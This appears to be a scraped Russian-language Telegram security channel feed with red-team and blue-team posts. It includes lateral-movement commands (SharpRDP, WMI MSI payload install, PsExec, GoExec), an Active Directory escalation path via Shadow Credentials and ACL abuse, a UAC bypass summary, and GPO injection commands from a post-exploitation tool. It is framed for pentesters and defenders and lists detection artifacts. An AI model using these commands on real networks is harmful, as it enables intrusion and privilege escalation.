Forwarded from RedBlue Notes
Горизонтальное перемещение: тени в инфраструктуре
Продолжаем говорить про перемещение, сегодня будут интересные утилиты.
Тихий проход через Headless RDP😑
Представьте: вы хотите попасть с одной машины на другую, но не размахивая флагом в логах. Один из элегантных способов — Headless RDP через SharpRDP. Команда:
Вот и вы уже запускаете код на удаленном узле, без графического окна и лишних признаков. Защитникам в таких случаях стоит обращать внимание на неожиданные загрузки mstscax.dll или RDP-трафик без интерактивной сессии.
WMI с MSI: установка, которая не то, чем кажется🤯
Другой и один из любимых методов — WMI с деплоем MSI. С точки зрения системы, это установка пакета, но внутри — полезная нагрузка:
Стороне атаки такой способ дает тишину, стороне защиты — повод мониторить необычные MSI-установки через WMI.
PsExec: громкий, но надежный🍞
Но нельзя обойти стороной и классику — PsExec. Это инструмент, который админы обожают за удобство, а синие команды — за предсказуемые следы. Запуск может выглядеть так:
Быстро, просто… и громко: появляется служба PSEXESVC, фиксируется SMB-трафик, остаются артефакты. Опытный атакующий может переименовать службу, очистить следы или использовать модифицированные версии. Опытный защитник — найдет их по событию 7045, именованным каналам \\.\pipe\psexesvc и подозрительным RPC-запросам.
GoExec: современный шпион👀
Тем, кто ценит тишину, стоит взглянуть на GoExec — современный аналог, умеющий работать через прокси и минимизировать новые артефакты. Он не так распространен, поэтому часто проходит под радаром:
Для атакующего — это способ двигаться в полутьме, для защитника — повод расширить поведенческую аналитику.
Как итог🍩
Весь этот арсенал объединяет простая логика: чем ближе способ к легитимной административной операции, тем сложнее его заметить. Для красных команд это значит — мимикрировать под штатную работу админа. Для синих — изучить эти «будни администратора» так, чтобы любое несоответствие бросалось в глаза.
Если вы дочитали до этого места — значит, вам точно интересна эта кухня. Поддержите статью лайком и подпишитесь на канал — впереди еще больше разборов, техник и историй с обеих сторон.
Пост имеет ознакомительный характер и предназначена для специалистов по безопасности. Автор и редакция не несут ответственности за любой вред, причиненный с применением изложенной информации. Распространение вредоносных программ, нарушение работы систем и нарушение тайны переписки преследуются по закону.
Продолжаем говорить про перемещение, сегодня будут интересные утилиты.
Тихий проход через Headless RDP
Представьте: вы хотите попасть с одной машины на другую, но не размахивая флагом в логах. Один из элегантных способов — Headless RDP через SharpRDP. Команда:
SharpRDP.exe computername=DC01 command=calc username=OFFENSE\admin password=Passw0rd
Вот и вы уже запускаете код на удаленном узле, без графического окна и лишних признаков. Защитникам в таких случаях стоит обращать внимание на неожиданные загрузки mstscax.dll или RDP-трафик без интерактивной сессии.
WMI с MSI: установка, которая не то, чем кажется
Другой и один из любимых методов — WMI с деплоем MSI. С точки зрения системы, это установка пакета, но внутри — полезная нагрузка:
Invoke-WmiMethod -Path Win32_Product -Name Install -ArgumentList @($true,"","\\192.168.1.4\share\payload.msi") -ComputerName TARGET -Credential $cred
Стороне атаки такой способ дает тишину, стороне защиты — повод мониторить необычные MSI-установки через WMI.
PsExec: громкий, но надежный
Но нельзя обойти стороной и классику — PsExec. Это инструмент, который админы обожают за удобство, а синие команды — за предсказуемые следы. Запуск может выглядеть так:
PsExec.exe \\TARGET -u Domain\Admin -p P@ssword cmd.exe
Быстро, просто… и громко: появляется служба PSEXESVC, фиксируется SMB-трафик, остаются артефакты. Опытный атакующий может переименовать службу, очистить следы или использовать модифицированные версии. Опытный защитник — найдет их по событию 7045, именованным каналам \\.\pipe\psexesvc и подозрительным RPC-запросам.
GoExec: современный шпион
Тем, кто ценит тишину, стоит взглянуть на GoExec — современный аналог, умеющий работать через прокси и минимизировать новые артефакты. Он не так распространен, поэтому часто проходит под радаром:
goexec --method scmr change --proxy 127.0.0.1:1080 TARGET_IP command.exe
Для атакующего — это способ двигаться в полутьме, для защитника — повод расширить поведенческую аналитику.
Как итог
Весь этот арсенал объединяет простая логика: чем ближе способ к легитимной административной операции, тем сложнее его заметить. Для красных команд это значит — мимикрировать под штатную работу админа. Для синих — изучить эти «будни администратора» так, чтобы любое несоответствие бросалось в глаза.
Если вы дочитали до этого места — значит, вам точно интересна эта кухня. Поддержите статью лайком и подпишитесь на канал — впереди еще больше разборов, техник и историй с обеих сторон.
Please open Telegram to view this post
VIEW IN TELEGRAM
👍11🔥3 3❤1
Нашел очередную, но достойную интерактивную платформу для тренировки работы в командной строке
Здесь и здесь более продвинутый уровень, либо оболочка bash ограничена
Знаете ли вы как можно вывести список всех файлов в директории не использую ls, а сделать это использую только echo ? 😳😁
#linux #cmd #bash
Please open Telegram to view this post
VIEW IN TELEGRAM
👍6 4❤3 2
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Ralf Hacker Channel (Ralf Hacker)
Три месяца назад было обновление скрипта certipy, а вот теперь вышло обновление и для Certify.
Blog: https://specterops.io/blog/2025/08/11/certify-2-0/
Wiki: https://github.com/GhostPack/Certify/wiki/4-%E2%80%90-Escalation-Techniques
#ad #pentest #redteam #adcs
Blog: https://specterops.io/blog/2025/08/11/certify-2-0/
Wiki: https://github.com/GhostPack/Certify/wiki/4-%E2%80%90-Escalation-Techniques
#ad #pentest #redteam #adcs
SpecterOps
Certify 2.0 - SpecterOps
Certify 2.0 features a suite of new capabilities and usability enhancements. This blogpost introduces changes and features additions.
❤3
Purple Team
Lateral Movement – BitLocker
BitLocker is a full disk encryption feature which was designed to protect data by providing encryption to entire volumes. In Windows endpoints (workstations, laptop devices etc.), BitLocker is typi…
A newly discovered lateral movement technique, revealed through the BitLockMove proof-of-concept, demonstrates how attackers can exploit BitLocker’s Component Object Model (COM) structure to execute malicious code under the context of an interactive user
#bitlocker #wmi #windows #redteam
Please open Telegram to view this post
VIEW IN TELEGRAM
🤝3
Немного про NoSQL инъекции
#web #pentest #nosql
Please open Telegram to view this post
VIEW IN TELEGRAM
UPD. Добавил пару площадок для SOC
Windows, *nix машины для самостоятельного пентеста. Во free тарифе всегда доступно 20 машин. Обучение, академия, лабы и т.д. Есть огромное количество CTF заданий в различных категориях.
Возможность сдать экзамены и получить сертификаты CBBH (Certified Bug Bounty Hunter), CPTS (Certified Penetration Testing Specialist), CWEE (Certified Web Exploitation Expert) и CDSA (Certified Defensive Security Analyst), CAPE (Certified Active Directory Pentesting Expert)
Аналог HackTheBox без CTF заданий. Академия в наличии
Академия веб пентеста от создателей BurpSuite. Для сдачи экзамена необходима активная подписка на Burp Suite Professional, цена экзамена 99$
Информацию почти обо всех прошедших и предстоящих CTF соревнованиях можно найти здесь
Русскоязычная площадка😎 . Большое количество CTF задач в самых различных категориях, в наличии Windows и Linux машины
Один из лучших ресурсов с задачами по криптографии. Нравится криптография ? Вам сюда, от азов до сложнейших задач
Киберполигон от компании Positive Technologies. Это виртуальная инфраструктура с реалистичными копиями IT-систем из разных отраслей
Русскоязычная площадка от ребят из команды TaipanByte, большое кол-во задач во всех основных категориях
Образовательная платформа, позволяющая изучать и практиковать основные концепции кибербезопасности. Рассчитана на новичков
Appsec тренировки, LLM, owasp top10, owasp api top10, aws top10 и т.д.
Путешествие в мир Linux, основные команды, лабы, руководства
Игра из 34 уровней для изучения Linux
Большое количество (~4000) крякми для изучения. Подойдет реверсерам
Для любителей бинарной эксплуатации (PWN)
Русскоязычная площадка. One task of the month - выкладывают по 1ой CTF задаче в месяц
Огромное (500+) кол-во заданий в самых разных категориях
Площадка с CTF заданиями начального уровня, почти на все задания можно найти райтапы
ВМ Phoenix для изучения уязвимостей, разработки эксплойтов, отладки программного обеспечения и общих проблем кибербезопасности
Парольные загадки (ребусы), например, пароль это сумма чисел от 1 до 446, соответственно надо написать простенькую автоматизацию и ввести в поле ввода
Простенький хакер квест состоящий из 20 уровней
Пара платформ для защитников:
Расследование реальных кибератак внутри смоделированного SOC
Практическое обучение по кибербезопасности, а также развитие навыков в лабораториях CyberRange
#crackmes #hacking #ctf #ethical
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥13❤5 2🤝1
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - olafhartong/BamboozlEDR: A comprehensive ETW (Event Tracing for Windows) event generation tool designed for testing and…
A comprehensive ETW (Event Tracing for Windows) event generation tool designed for testing and research purposes. - olafhartong/BamboozlEDR
Генератор различных событий (EventID) для тестирования EDR
Microsoft-Windows-Antimalware - Threat detection events (Event ID 48)
Microsoft-Windows-Antimalware-RTP - Real-time protection events (Event IDs 27, 14)
Microsoft-Windows-LDAP-Client - LDAP search and authentication events
Microsoft-Windows-TCPIP - TCP/IP connection events
Microsoft-Windows-WMI-Activity - WMI query and execution events (Event IDs 22, 11)
Microsoft-Windows-AMSI - AMSI scan events
Microsoft-Windows-Defender - Windows Defender events (Event IDs 5000, 5001, 1116, 1117)
Microsoft-Windows-DotNETRuntime - .NET runtime events
Microsoft-Windows-Crypto-DPAPI-Events - DPAPI access events
Microsoft-Windows-Security-Auditing - Security audit events (Event ID 4688)
Microsoft-Windows-PowerShell - PowerShell commandlet and AMSI events
Microsoft-Windows-RPC - RPC function trace events (Event ID 14)
Microsoft-Windows-CodeIntegrity - Code Integrity events (Event IDs 3023, 3036, 3076, 3077)
Microsoft-Windows-AppLocker - AppLocker events (Event IDs 8003, 8004, 8006, 8007, 8021, 8022, 8024, 8025)
Microsoft-Windows-NTLM - NTLM blocking events (Event ID 8001)
#edr #golang
Please open Telegram to view this post
VIEW IN TELEGRAM
❤1 1
Forwarded from Bagley's 📚 Notes
Всем 👋 ! Это Bagley
💬 Всё чаще стал замечать в тематических каналах вопросы:
💭 Чтобы облегчить задачу с поиском, поделюсь своим мнением по этому поводу (📖 Для начала ознакомиться с этим постом)
#️⃣ Литература
🔘 The Web Application Hackers Handbook
🔘 Ловушка для багов. Полевое руководство по веб-хакингу
🔘 Bug Bounty Bootcamp The Guide to Finding and Reporting Web Vulnerabilities
🔘 Bug Bounty Playbook
🔘 Bug Bounty Hunting Essentials
🔘 Web Hacking 101
🔘 The tangled Web a guide to securing modern Web applications
⚠️ Немного для мобилок
🔘 Android Security Internals
🔘 IOS Application Security
#️⃣ Методологии
🔘 Bug Hunters Methodology от JHaddix'a: Recon и App Analysis Master
🔘 ZSeanos methodology
🔘 WSTG от OWASP
#️⃣ YouTube каналы
🔘 PinkDraconian
🔘 NahamSec
🔘 Bug Bounty Reports Explained
🔘 STÖK
🔘 Rana Khalil
🔘 InsiderPhD
🔘 John Hammond
➕ множество тематических TG-каналов
➕ личные страницы исследователей, например в X
#learning
Как смочь в этом направлении. Дайте дельных советов. Очень интересная тема, но где нырять в неё чтобы не слишком глубоко было. Какую литературу почитать для хорошего фундамента можно?
хотелось бы вникнуть и научится (желательно бесплатно)
с чего начать, что почитать, где посмотреть?
#learning
Please open Telegram to view this post
VIEW IN TELEGRAM
Notes from Black Hat USA 2024:
“I hate to report it, but the Russian underground is as strong as ever”
#pentest #blackhat #blackhatusa
Please open Telegram to view this post
VIEW IN TELEGRAM
😁5 4
Please open Telegram to view this post
VIEW IN TELEGRAM
Продвинутый REST API фаззер с высокой скоростью работы. Строит HTML отчеты по окончании. Очень подробная документация на официальном сайте. Написан на
UPD. 13.3.2
Запуск в режиме black box:
cats --contract=openapi.yml -H "Authorization=$token" --server=https://api-url.com -b -k
Запуск в режиме context mode:
cats --contract=openapi.yaml --server=http://localhost:8080 --headers=headers.yml --refData=referenceData.yml
Запуск в режиме continuous fuzzing:
cats random --contract=openapi.yaml --server=http://localhost:8080 -H "API-KEY=$token" --mc 500 --path "/users/auth" -X POST --stopAfterTimeInSec 10
📚 Тестируем Github API с CATS
#soft #cats #java #fuzzer #web
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3 1
Forwarded from 1N73LL1G3NC3
Collect infrastructure and permissions data from vCenter and export it as a BloodHound‑compatible graph using Custom Nodes/Edges
Please open Telegram to view this post
VIEW IN TELEGRAM
1👍2🔥1
Forwarded from CyberSecrets
Задача для собеседования №3
Давно не было задачек для собеседования.
Сценарий:
В ходе изучения инфраструктуры было обнаружено, что группа
Дополнительные условия:
- Есть учетные данные от пользователя
- В инфраструктуре нет дополнительных настроек безопасности все по умолчанию.
- Функциональный уровень домена - 2016
Цель:
Получить привилегии группы
Решение:
По умолчанию все доменные пользователи и компьютеры входят в группу `AUTHENTICATED USERS`. Таким образом есть возможно менять атрибуты для объекта компьютер `SRV-02`. Функциональный уровень домена позволяет выполнять технику Shadow Credentials. Получаем TGT билет Kerberos для `SRV-02` и теперь есть возможность изменять ACL для OU `OU_SERVICE`. Добавляем права `GenericAll` пользователю `PENTESTER` над объектом `OU_SERVICE`, а также меняем наследование OU, чтобы получить права `GenericAll` над всеми объектами, входящих в эту OU. Еще раз выполняем технику Shadow Credentials и получаем контроль над учетной записью `SVC_BACKUP`, которая является членом целевой группы `SERVER_ADMINS`.
#Внутрянка #Задачи
Давно не было задачек для собеседования.
Сценарий:
В ходе изучения инфраструктуры было обнаружено, что группа
AUTHENTICATED USERS имеет права GenericWrite над объектом компьютер SRV-02. Сам объект компьютера имеет права WriteDacl над OU OU_SERVICE. Учетная запись SVC_BACKUP является дочерним объектом OU OU_SERVICE, а также членом группы SERVER_ADMINS.Дополнительные условия:
- Есть учетные данные от пользователя
PENTESTER- В инфраструктуре нет дополнительных настроек безопасности все по умолчанию.
- Функциональный уровень домена - 2016
Цель:
Получить привилегии группы
SERVER_ADMINS.Решение:
#Внутрянка #Задачи
👍3
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥3
Тут отчет и инфографика от интерпола подъехали
Что по цифрам ?
Удалось вернуть более $97млн, правда украдено было чуть побольше, $484млн😱
Такая скоординированная операция на криптоскам и ransomware ребят из африканских стран
Ладно, всем хороших выходных, можно бахнуть, но главное не
#ransomware
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1
Начались отборы на Kuban CTF, если кто принимает участие, пишите в чат, интересно 😱
#ctf
Please open Telegram to view this post
VIEW IN TELEGRAM
A chained technique has been identified that allows a local, unprivileged attacker to achieve silent privilege escalation to administrator by bypassing protections enforced by Elastic Defend v9.0.4. The method leverages a trusted auto-elevated Windows binary (fodhelper.exe) in conjunction with a registry hijack and COM object execution, resulting in arbitrary code execution at elevated privileges - without triggering a UAC prompt or EDR detection
#uac #bypass #windows #lpe
Please open Telegram to view this post
VIEW IN TELEGRAM
1❤1
GitHub
GitHub - synacktiv/GroupPolicyBackdoor: Group Policy Objects manipulation and exploitation framework
Group Policy Objects manipulation and exploitation framework - synacktiv/GroupPolicyBackdoor
Инструмент пост эксплуатации для различных манипуляций с GPO. Написан на
Впервые представлена на DEFCON 33
Примеры:
#backup
python3 gpb.py restore backup -d 'corp.com' -o './my_backups' --dc ad01-dc.corp.com -u 'john' -p 'Password1!' -n 'TARGET_GPO'
#inject
python3 gpb.py gpo inject --domain 'corp.com' --dc 'ad01-dc.corp.com' -k --module modules_templates/ImmediateTask_create.ini --gpo-name 'TARGET_GPO'
Пример ini:
[MODULECONFIG]
name = Scheduled Tasks
type = computer
[MODULEOPTIONS]
task_type = immediate
program = cmd.exe
arguments = /c "whoami > C:\Temp\poc.txt"
[MODULEFILTERS]
filters =
[{
"operator": "AND",
"type": "Computer Name",
"value": "ad01-srv1.corp.com"
}]
GPO creation, deletion, backup and injections
Various injectable configurations, with, for each, customizable options (see list in the wiki)
Possibility to remove injected configurations from the target GPO
Possibility to revert the actions performed on client devices
GPO links manipulation
GPO enumeration / user privileges enumeration on GPOs
#gpo #redteam #windows
Please open Telegram to view this post
VIEW IN TELEGRAM
1 4👍3 2 2